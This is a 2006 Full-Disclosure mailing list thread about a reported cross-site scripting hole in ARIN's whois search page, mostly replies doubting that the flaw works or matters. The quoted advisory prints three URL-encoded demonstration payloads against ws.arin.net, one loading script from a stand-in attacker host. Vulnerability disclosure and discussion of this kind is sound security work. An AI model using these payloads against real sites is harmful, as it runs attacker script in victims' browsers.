Re: Arin.net XSS

[Simon Smith <simon () snosoft com>]

Right,
    Did this ever work? This fails for me man. How did you verify it?

Steven wrote:
> ok?
>
> So what exactly are you going to exploit here?  This site doesn't have any logins or even use cookies.  Are you going 
> to trick a user into entering in a credit card number before they can search the whois database?
>
> I think that XSS in many instances is a serious issues.  Many of the XSS issues reported on FD are rarely of much 
> consequence but could theoretically lead to a sessions hijack or tricking the user into a fake login screen.  
> However, in this instance I fail to see what the point could possible be?  If it is that you can simply run 
> javascript then so what?  Close to 100% of any webhosting provider on the internet will let you upload your own 
> javascript.  Might as well report that geocities.com is vulnerable to XSS because you could upload an html file with 
> javascript on it.
>
> Anyway.. that's my take on this.  Feel free to correct me.. I don't mind.
>
> Steven
>
> ----- Original Message ----- 
>   From: Terminal Entry 
>   To: Full Disclosure ; Bug Traq 
>   Sent: Thursday, March 02, 2006 11:17 PM
>   Subject: [Full-disclosure] Arin.net XSS 
>
>
>   Title
>   ARIN.NET input validation holes in "?queryinput=" allows remote users conduct cross-site scripting attacks
>
>   Notification
>   Multiple attempts to contact Arin site administrators went unanswered
>
>   Exploit Included:  Yes
>
>   Description
>   The "?queryinput=" script does not properly validate user-supplied input in several parameters to filter HTML code. 
> A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting 
> code to be executed by the target user's browser. 
>
>   Some demonstration exploit URLs are provided:
>   http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>   http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
>   http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
>   Discovered by Terminal Entry security [.at.] peadro (.)net
>
>
>
>
> ------------------------------------------------------------------------------
>   This email and any files transmitted with it are confidential and intended solely for the use of the individual or 
> entity to whom they are addressed. If you have received this email in error please notify the system manager. This 
> message contains confidential information and is intended only for the individual named. If you are not the named 
> addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail 
> if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended 
> recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of 
> this information is strictly prohibited.
>
>
>
> ------------------------------------------------------------------------------
>
>
>   _______________________________________________
>   Full-Disclosure - We believe in it.
>   Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>   Hosted and sponsored by Secunia - http://secunia.com/
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 


Regards, 
        Adriel T. Desautels
        Harvard Security Group
        http://www.harvardsecuritygroup.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/